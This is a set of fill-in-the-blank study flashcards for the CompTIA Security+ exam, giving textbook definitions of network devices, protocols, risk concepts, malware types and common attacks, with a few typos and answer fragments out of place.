is a pair of ﬁrewalls that segregate web-facing server traﬃc from the internal network.
Web Application Firewall (WAF)
_____ blocks attacks and provide security at Layer 7 of the OSI model. A _____ can protect a web server from cross-site scripting attacks.
_______ connect networks generally based on network addresses, usually IP network addresses. They can be used to create subnets which isolate broadcast domains, and to some extent isolate security zones with access control lists (ACLs).
______ connect hosts on a LAN by MAC address. They reduce or eliminate collisions. VLANs are connected by routers or multilayer switches. Client access should be
_______ allow scalable secure remote access by being able to handle the load of multiple heavily utilized VPN connections.
________ distribute the load among multiple Web servers, increasing performance, and reliability, while eliminating a single point of failure by providing redundancy
Sniffers; protocol analyzer
______ capture network packets. They are usually integrated with a ________ that understands and analyses the content of the packets.
_____ are single fake systems meant to divert attackers away from a production network and to study hacker tools and techniques. A ____ emulates a set of servers.
____ based Intrusion Prevention systems take the next step in that they also neutralize attacks.
_______ based NIDS/NIPS (also HIDS/HIPS) need updates. They are best for known attacks
_____ based NIDS/NIPS (also HIDS/HIPS) look for unusual events. They are best for zero day attacks
______based NIDS/NIPS (also HIDS/ HIPS) match traﬃc patterns. To kill connections NIPS do shunning, and blocking on attackers, and TCP resets on victims
web security gateway/content ﬁlter
a ______ often implemented on a proxy server, blocks web sites by URL.
Uniﬁed Threat Management (UTM)
_____ and block traﬃc based on URL, malware, buﬀer overﬂows, cross-site scripting (XSS), cross site request forgery (XSRF), and injection attacks.
a ______ caches web pages, while a reverse Proxy can have sophisticated ﬁlters. A SPAM ﬁlter is typically incorporated in Email. An all-in-one security appliance integrates many of these functions.
Spanning Tree Protocol (STP)
A type of protocol that stops switching loops.
this standard features port-based extensible authentication protocol (EAP). It the most secure way to implement network access control (NAC) for contractors, or wireless network access. ______ is associated with RADIUS.
means that any connection not explicitly allowed is denied by default.
______ should be used to protect against SYN ﬂood attacks, trace the source, generate alerts, and block attack traﬃc.
_____ prevents network disruption if both ends of a network cable are connected to diﬀerent switch ports.
____ Logs from multiple sources should account for incident time oﬀsets. The security log would show when a user attempted to log-in at various times of the day.
Subnets and VLANs subnets vlans
____ and ____ separate broadcast and security domains. ____ are on routers. ____ are created on switches.
_______ has a one-to-one mapping between internal and external addresses.
_____ allows the mapping to change dynamically.
Port Address Translation (PAT)
______ allows multiple hosts to connect at the same time
Remote access policy; SSH
______ sets rules for remote access. Remote access should use a secure protocol such as ____ . A VPN concentrator provides remote access for large numbers of users.
Network Access Control (NAC)
_______ Examines and remediates foreign hosts that attempt to connect to a network. It also updates patches and antivirus deﬁnitions and performs a virus scan before granting access.
In _______ physical servers host multiple virtual servers. This cuts down on the footprint. The specialized operating system that hosts the virtual machines is the ________.
______ is the term for an attack that aﬀects more than one virtual machine and/or the hypervisor
_______ utilizes virtualization to provision guests on demand.
In ______ as a Service (PaaS), developers create applications on a provider's platform.
In ____ as a Service (SaaS), the vendor supplies the software product.
In _____ as a Service (IaaS), users can start, stop and conﬁgure virtual servers.
was originally developed for IPv6. It can be used as the encryption piece of a VPN with L2TP setting up the tunnel, or it can do both.
ESP, AH and IKE.
IPSec protocols include ___, _____, and ____
SNMP SNMPv1 SNMPv2 SNMPv3
____ is used to manage network devices including printers, servers, routers and switches. ____ and _____ are insecure protocols. ______ is secure and provides data integrity, authentication, conﬁdentiality and protection
____ is a secure replacement for Telnet and FTP.
_____ replaces Telnet.
SCP and SFTP
___ and ____ replace FTP.
FTPS is another secure version of FTP, but it is not based on ____
____ resolves a host name to an IP address.
_____ attacks include spooﬁng and cache poisoning.
DNSSEC and TSIG
DNS security measures include _____ and _____ which use certiﬁcates for authentication of DNS servers.
______ transfers Web pages. _____ does this securely using certiﬁcates.
_____ is the underlying protocol for HTTPS. It can also be used in SSTP to set up a VPN that does not require a VPN client setup.
_____ is more secure than SSL because it checks that a certiﬁcate belongs to the web site; it does mutual authentication. It can also can be used to secure traﬃc between SMTP servers.
IP, IP TCP Man-in-the-Middle SYN Flood
___ provides addressing and routing. An attacker can forge the source ____ address. ___ provides reliability through sequence numbers. An attacker might monitor network transmissions to predict a sequence number and forge an acceptable response. This is a _______ attack. The three-way TCP handshake can be exploited in a _____ attack.
____ is faster than TCP but unacknowledged. It is used in videocasting and VoIP.
______ is a UDP Denial of Service (DOS) attack.
ICMP (Internet Control Message Protocol)
_____ provides network reachability and diagnostics. It supports ping, tracert, and router messages such as source routing.
ICMP (Internet Control Message Protocol)
_____ attacks include Ping of Death, Smurf Attack and bogus source routing updates. Internet Control Message Protocol
IPv4 IPv6 100
___ has a 32 bit address space that is depleted. ____ has a 128 bit address, enough for ____ IP addresses for every square inch on the earth.
Storage Area Network (SAN) Protocols.
Fiber Channel over Ethernet (FCoE) and iSCSI leverage your production network to create a SAN. Attacks on the production network aﬀect FCoE and iSCSI.
Fiber Channel (FC)
_____ is an isolated network. Deploying a FC fabric provides multi-pathing which increases bandwidth and fault-tolerance.
_____ has decreased as newer protocols do not adhere to it
____ is weak. It has a 24 bit initialization vector. It should not be used. _____ is much stronger as it uses EAP, TKIP, and RC4.
___ replaces RC4 with AES. ______ is better than WPA2 as it replaces TKIP with CCMP which changes the whole encryption key on a minute by minute basis, while TKIP changes only part of the encryption key.
EAP is Extensible Authentication Protocol.
______ use EAP.
______ uses certiﬁcates.
PEAP (Protected EAP)
___ encapsulates EAP in an encrypted and authenticated TLS tunnel
LEAP (Lightweight EAP)
______ uses MS-CHAPv2 to protect authentication credentials and provide mutual authentication.
Technical risk controls
____ would use speciﬁc hardware or software. They include screen lock, ﬁrewalls, IDSs/ IPSs, ACLs, proximity locks and mantraps.
____would avoid single points of failure, include security policy, fault-tolerant measures and recovery procedures.
Operational risk controls
_____ are daily controls including a security guard, auditing, user rights review and background investigations.
A _____ is a false alarm.
A ____ is where an attack is not identiﬁed. It is more serious than a false positive. In Biometrics a false acceptance is more serious that a false rejection.
______ checking an employee's work while they are on vacation to discover fraud and collusion
Two software developers switching roles to eliminate a single point of failure caused by a singular skill set is an example of ______
_____ would be violated if the accounting manager could be accounts payable and accounts receivable work. Rather, the accounting manager should just be able to approve work.
______ is based on hard numbers while ____ is based on subjective ranking.
____ is based on asset value and exposure, so risks are mitigated based on cost.
maximum tolerable downtime (MTD)
The _______ is what a business can accept after a disaster
mean time to repair (MTTR)
The ______ should be less than the MTD.
recovery point objective (RPO)
The ____ is how much critical data and/or critical systems must be restored after a disaster
recovery time objective (RTO)
The _____ should be shorter than the MTD. The RTO is the target time when critical systems should be back up and running after a disaster.
business impact analysis (BIA)
A _____ is a high level analysis that identiﬁes a company's exposure to the sudden loss of critical business functions.
Responses to Risk
Most mission impacting risks should be mitigated. However, risks cannot be eliminated.
Risks can be accepted if the cost to mitigate the risk is more than the cost of the asset
Risks can be ____ if the loss of the asset is unacceptable.
_____ uses virtualization to provision guests on demand. Security drawbacks of cloud computing are loss of physical control over data and blended systems and data
interconnection security agreement (ISA)
An ______ is between organizations that own and operate connected IT systems to document the technical and security requirements of necessary data ﬂows
_____ is a part of conﬁguration management. It handles system upgrades and modiﬁcations so they do not impact security.
________ ensures that the proper conﬁgurations are reapplied to systems and attacks are contained.
Order of Volatility
Collect the most perishable material ﬁrst: CPU cache, RAM, swap ﬁle, hard drive, remote logs. Create an image of the hard drive. Perform a hash before and after the image and hash the imaged hard drive.
Record Time Oﬀset
Can be correlated to see the chain of event if the record time oﬀset is correct
Chain of custody
_____ is continuously documenting the state and location of data and hardware from collection to Disposition.
Big Data Analysis
______ can discover the locus of attacks by correlating attacks against multiple companies
Collect Evidence In Order of Volatility
▪ CPU Registers ▪ CPU Cache ▪ Memory ▪ ARP Cache ▪ Swap File ▪ Optical Media ▪ Remote Logs
is where general measures are taken against malware.
is the ﬁrst response in incident management to clients reporting spikes in malware infections.
can provide automated notiﬁcation of item removal.
is the auditing or reviewing an organization's security systems (both physical and logical) on a regular basis.
Consistent with collecting evidence; contain the incident.
is where the team analyses the incident and determines steps against future occurrence.
Security policy training
_____ should be customized by the role of the user.
Shoulder Surﬁng, Clean Desk Policy and Sanitization.
Training should include protection from shoulder surﬁng. It also includes a clean desk policy, data sanitization, data labeling and protection by classiﬁcation.
Social Networking and P2P File Sharing.
Users should be educated to avoid disclosing information via social networking sites and/or P2P ﬁle sharing
HVAC systems should be should be integrated into the ﬁre alarm systems to help prevent a ﬁre from spreading and should shut down when a ﬁre is detected in the datacenter. FM200 is the best suppression method.
EMI is Electro Magnetic Interference while RMI is Radio Magnetic Interference
Hot and cold aisles
____ regulate cooling within a datacenter to maximize airﬂow, and increase HVAC eﬃciency.
It is a detective security control that could determine if conﬁdential or equipment is being removed.
____ provide access based on facial recognition among other factors.
A _____ is a conﬁned space that only one user can enter at a time. An outer door locks when the user enters. To leave the mantrap, and gain access to the protected area, the user must successfully authenticate to the inner door.
business impact analysis (BIA)
A ___ deﬁnes recovery point objectives (RPO) and recovery time objectives (RTO).
service level agreement (SLA)
A _____ is a formal contract between two companies that is more enforceable than an informal memorandum of understanding (MOU).
business practice agreement (BPA)
A _____ lists what contractors should and shouldn't do.
interconnection security agreement (ISA)
An ______ is between organizations that own and operate connected IT systems to document the technical and security requirements of necessary data ﬂows.
single points of failure
Measures that remove include _____ RAID, clustered servers, redundant power supplies, and redundant ISPs.
Backup Execution and Frequency
Backup types include full, diﬀerential, and incremental. ▪ Data deduplication reduces the size of backups, the time to backup and restore time. ▪ One copy of a backup should be stored onsite for quick recovery. Another copy of a backup should be stored oﬀsite, away from the main site for disaster recovery.
Backup/Backout Contingency Plans
In the event that Plan A fails, have a pre- conceived and viable Plan B. In the event the weekend datacenter upgrades fail, have a backout plan to undo any changes
____ includes redundant circuits, RAID, clustered servers, network load balancing, mirrored memory, redundant power supplies and redundant ISPs.
A ___ is an alternate location with no data or equipment.
A ______ describes a semi-operational site. It provides a building and network equipment, but not current application data
The highest level of availability is provided because the site has full equipment and current data
conﬁdentiality, integrity, and availability.
The parts of CIA are ____, ______, and _____
is protection from unwanted disclosure is the primary concern of governments in terms of data security is preserved by strong authentication, strong encryption, ACLs, least privilege, need to know and sanitization of retired computer systems. Items that could compromise conﬁdentiality include USB drives and spyware.
is the continuous operation of computing systems and networks. - Redundancy and fault tolerant measures such as RAID and clustered servers increase availability. - A virtualization farm increases availability.
____ is the concept that addresses the threat of data being modiﬁed without authorization. Integrity is provided by a hash and input validation. ▪ A forensic image of a computer's memory or hard drive should be run through a hash such as SHA256 or SHA512. ▪ Kerberos centralizes ﬁle integrity protection.
___ is provided by fencing, lighting, locks, CCTV, guards, ﬁre alarms, ﬁre drills, and alternate escape routes.
___ are often attached to executable ﬁles. Their primary goal is replication by spreading from ﬁle to ﬁle. An act as simple as opening an attachment can infect a system. Eﬀects can include data deletion, ﬁle corruption, ﬁle alteration, data theft and DoS. ▪ Cell phones with network access and the ability to store data ﬁles are susceptible to viruses. include data deletion, ▪ corruption, alteration, and theft. ▪ An armored virus hides its location and is diﬃcult to reverse engineer in a lab.
A ___ continually changes to prevent signature-based detection.
_____ are self-contained programs. They can spread by network shares with no user interaction. As a result, worms spread faster than viruses. They can email a copy of themselves to everyone in the address book of an infected computer.
____ are suspicious system-level kernel modules which modify ﬁle system operations. They are characterized by hooking processes and erasing logs. Hooking processes hide themselves from discovery
____ disguise themselves as harmless or "friendly" ﬁles.
A ____ makes an alternate/unsecured entry point to an application or computer.
A ____ is malicious code that is triggered by a time, date or event. For example, a disgruntled employee inserts additional code into the payroll system which will activate only if he is dismissed.
A ____ is a large group of infected computers/bots/zombies that have been taken over by hackers. An indication is several PCs that are running extremely slow, and are opening many connections to the same unknown destination.
____ are pop-up advertisements, often targeted based on browser history. Adware is often bundled with freely downloaded software.
_____ secretly collects information about users. Spyware negatively aﬀects conﬁdentiality. It can slow down a PC. Used to Track cookies and browser history
_____ is malware that extorts users to pay a ransom to decrypt their data, hard drive or source code. For example, an attacker that encrypts a user's documents and demands payment to decrypt them.
Users that mistype a URL and end up at a web site that infects them with malware have been victims of ______
Major attack types include man-in-the-middle, DDoS, DoS, replay, smurf attack, spooﬁng, spam, phishing, spim, vishing, spear phishing, Xmas attack, pharming, privilege escalation, DNS poisoning and ARP poisoning.
Vlan tagging standard
Q in Q
DoS (Denial of Service)
A _____ attack originates from one computer
DDoS (Distributed Denial of Service)
A _____ attack originates from multiple computers and attempts to make a computer or network unavailable to legitimate users by consuming resources such as network connections.
DDoS (Distributed Denial of Service)
An example of a ____ would be a large amount of transmissions from multiple external computers to the web server, which is now inaccessible to users.
A ___ attack is a DDoS attack that uses UDP packets.
___ is a DDoS attack in which multiple external hosts start but do not ﬁnish the three way TCP handshake; exhausting the half open connection queue.
____ are a DoS attack in which the attacker impersonates the IP address of the victim and pings the subnet broadcast address.
_____ s set every option for the protocol in use, lighting it up like a Xmas tree. This consumes resources and can be used in a DoS; or it can be used to do stack ﬁngerprinting in which the target OS is identiﬁed.
Attackers can spoof the source IP address, the MAC address or a Web site. URL spooﬁng is phishing.
If the IP address is spoofed for the purpose of impersonation, then this is a _____ attack. The attacker monitors the packets, guesses the sequence number, knocks out the victim with a SYN attack and injects his own packets, claiming to have the address of the victim.
Replay attacks Man-in-the-middle
______ capture and then replay the authentication credentials at a later time or date. ______ attacks take place in real-time. SSL certiﬁcate warnings might indicate a man-in-the-middle attack. A replay attack might capture valid wireless traﬃc for later retransmission to discover the encryption key. The attacking computer will have large network traﬃc dump ﬁles.
DNS cache poisoning
_____ inserts false information in a DNS name server's cache.
redirects Web site traﬃc to a spoofed Web site, by changing the DNS records, DNS cache or the hosts ﬁle.
In ___ , an attacker responds to an ARP broadcast for the victims MAC
_____ attempts to gain sensitive information by masquerading as trustworthy.
______ targets select groups of people with something in common.
_______ is targeted phishing of senior executives and other high proﬁle targets.
______ is phishing over the phone.
_____ is unsolicited advertising via email.
______ is SPAM over Instant Messenger
_____ is SPAM over Instant Texting.
mail relay server
The best location for a spam ﬁlter is in front of the _____ . The SPAM folder settings should be checked if a user is not able to receive email from a speciﬁc user.
______ often do more damage than outside hackers. WikiLeaks is an example of this. Intrusion Detection/Prevention Systems also monitor/block inside attacks. Auditing is also helpful.
In _____ an attacker with access to a user account exploits a bug or conﬁguration error to gain elevated privileges.
In ______ attacks the hacker probes for and attempts to compromise the weakest link in a chain of trust. For instance, if a small supplier has access to an extranet for a large company, the attacker will attempt to socially engineer the weakest employee at the small supplier.
_____ attacks target web browsers. A modern and patched browser should be used.
Server-side input validation
______ is more secure than client-side input validation.
Watering hole attack
______ hackers infect web sites of interest to their targets.
______ is looking over someone's shoulder to view conﬁdential information.
_____ involves sorting through the trash to discover information to be used in a subsequent attack.
_____ is following closely behind an authorized user to gain unauthorized access to a secured area before the door is closed. Countermeasures to tailgating include mantraps, security guards and user education.
_____ are falsehoods that convince a user to harm their, or their organization's, computer or security posture. Suspected hoax emails to users should be forwarded to administrators and not to other users.
_____ is phishing directed against an organization's hierarchy. An example of whaling is a convincing, well-researched email attack sent to the company's Chief Executive Oﬃcer (CEO).
_____ is phishing directed against a particular, high-value group
_____is voice phishing. It leverages VoIP phone calls.
Social Engineering Principles of Attack.
These attacks include authority, intimidation, consensus/social proof, scarcity, urgency, familiarity/liking and trust
If users are encouraged to click on a link in an email to obtain exclusive access to the newest version of a popular smartphone, it is an example of _____ .
____ points are unauthorized wireless access points that are used to gain access to a secure network.
_____ are duplicate access points that has been created to allow a hacker to conduct a man-in-the-middle attack.
RFI and EMI
___ and ___ is eliminated by ﬁber optic cabling.
RFI and EMI
___ and ___ are mitigated by shielding, coaxial and STP cabling, and using conduits.
Bluejacking, Bluesnarﬁng, and Bluebugging.
These exploits use Bluetooth. Bluejacking pops up unwanted messages on a smart phone. Bluesnarﬁng is more serious because it allows total access to a smart phone including any data such as an address book and emails. In Bluebugging the attacker can also monitor a smart phone user's conversation and camera.
In ____ a hacker attacks a dial-up site.
In _____ the location and speciﬁcs of wireless access points are documented by nearby chalk marks. It involves randomly attempting to connect to wireless network access points and documenting the locations.
In _____ a driver searches for Wi-Fi networks using a portable computer or smart phone. War driving is a reason why wireless access points should not be placed near a building's perimeter.
IV Attacks and Packet Sniﬃng.
The initialization vector (IV) is a semi-random value factored with the encryption key. Longer and more random IVs provide more security. WEP only uses a 24 bit IV. WEP uses an RC4 key that can be discovered by packet sniﬃng on plain text initialization vectors. Packet sniﬃng can also discover passwords and other data sent in cleartext by protocols such as FTP, Telnet, PAP, SNMPv1 and v2.
▪ A buﬀer stores data and instructions. An early buﬀer attack is a _____. ▪ Measures to protect against buﬀer overﬂows include input validation, patching, and the no-execute bit of Data Execution Prevention. ▪ DLP is a feature of modern CPUs that segregates areas of memory into data and code
____ is insertion of bogus information into a database. Stored procedures can be used for SQL injection.
compromises the logic of an XML application or service
exploits web based applications that construct LDAP statements based on user input
Input validation, secure coding practices and patching are defenses for ____ .
A ____ exploits insuﬃcient validation of user supplied ﬁle names so that characters representing "traverse to parent directory" are parsed. The goal is to access a ﬁle that is not intended to be accessible, such as a password ﬁle or other conﬁdential data.
In _____ , an attacker modiﬁes dynamically generated content on a Web page by entering HTML code into an input mechanism, such as a form ﬁeld. Commands are executed with the same privileges and as those of the application.
A ___ attack exploits computer vulnerabilities that are hereto unknown so that a patch does not exist. Anomaly based IDS/IPS and antivirus programs are best are detecting/preventing zero day attacks.
____ are small text ﬁles that pass information between Web pages, such as a shopping cart. Tracking cookies and browser history are used by adware. Third party cookies are from advertisers and should be blocked.
Flash cookies/Locally Shared Objects (LSOs)
contain cookie-like data that a web site running Adobe Flash can place on your hard drive
_____ are browser helpers that may include adware or spyware. Often they not removed by anti-spyware programs. Unsigned browser helpers should be removed.
____ is the hijacking/reuse of a magic cookie used to authenticate a user to a remote server. Authentication cookies are exploited in session hijacking.
.TCP and/or HTTP headers are changed in ____ . TCP headers have ﬂags such as URG, ACK, PSH, RST, SYN and FIN. Flags are speciﬁc to header manipulation. HTTP headers can also be changed so that malicious data is passed to a vulnerable web application.
Attack mitigation and deterrence measures
______ include monitoring of system logs, strong physical security, host & network hardening, port security and a strong security posture.
Physical detective and preventive systems
______ should updated on a regular basis with the latest countermeasures. Information about protective measures and systems should be kept secret.
______ contains system, security and application logs.
The ______ contains information on system startup, service startup, time changes and backups
The _____ has auditing and log-on information
The ______ contains events that are logged by applications.
______ includes hardware locks, mantraps, video surveillance, fencing, lighting, as well as proximity and badge readers.
______ includes disabling unnecessary services, protecting management interfaces and applications, password protection, disabling unnecessary accounts and applying the latest patches. Web servers should be placed in a DMZ after _____ the OS.
_______ includes alarms, alerts and trends. With a constant system changes, managing IT security for servers, workstations, laptops, ﬁrewalls, routers, switches and ﬁrewalls is extremely diﬃcult to manage without automation.
________security controls include CCTV, facial recognition software, sign in logs and routine security audits.
________ security controls include an access control system, an armed guard, a mantrap and bollards
______ includes initial baseline conﬁguration, continuous security monitoring and remediation. An initial baseline allows an anomaly detection system to evaluate traﬃc properly.
A ______ attack can be detected by system resource monitors and baselines. The baseline should be updated whenever software is upgraded on a production system. The conﬁguration baseline should be updated after deploying a new service pack. A security template is used to both deploy and reapply baseline security conﬁgurations.
A _____is an application that checks computers and networks for weaknesses such as missing patches or misconﬁguration. Vulnerability scanners can be used to test the security of a network for a wide range of problems without disrupting operations. Examples of a comprehensive vulnerability scanners include Nessus and the MBSA. Complimentary security assessment tools include port scanners, network mappers and password crackers.
Risk is equal to the probability that a threat will exploit a vulnerability times the cost of the asset. Risk = Threat x Vulnerability x Cost of asset.
The main diﬀerence between qualitative and quantitative risk assessment is that ______ is based on calculations while _____ is based on subjective ranking
______ is more thorough but more disruptive than vulnerability scanning in that it also includes social engineering, buﬀer overﬂows and active testing of physical security.
Penetration testing Penetration testing
------ actively tests security controls on a system. It's exploiting successive vulnerabilities to bypass security controls. It should only be conducted after obtaining express written authorization as it actively tests security controls and can cause system instability. An advantage of _____ over vulnerability testing is that it proves that a system could be compromised
_____ is a passive attempt to identify weaknesses.
penetration testing and Vulnerability scanning
_____ and ______should be used when assessing a network containing resources that require near 100% availability.
Black Box, Gray Box, White Box.
The color of the box is determined by what a penetration tester knows about a network before testing.
In____ penetration testing, the penetration tester has no prior knowledge of the network.
In ______ penetration testing, the penetration tester knows what a user knows.
In _____ penetration testing, the penetration tester is given administrative access.
A ____ is an application that discovers security vulnerabilities by sending random input strings to a program. A vulnerability is discovered if that input results in an exception, crash or server error
Secure Coding Concepts.
Exception handling takes care of special conditions that change the normal ﬂow of program execution. Software testing can catch exceptional conditions such as bad input and data errors.
Account lockout is a form of DOS. True or False
SY0-401:3 TS Quiz Threats and Vulnerabilities96 terms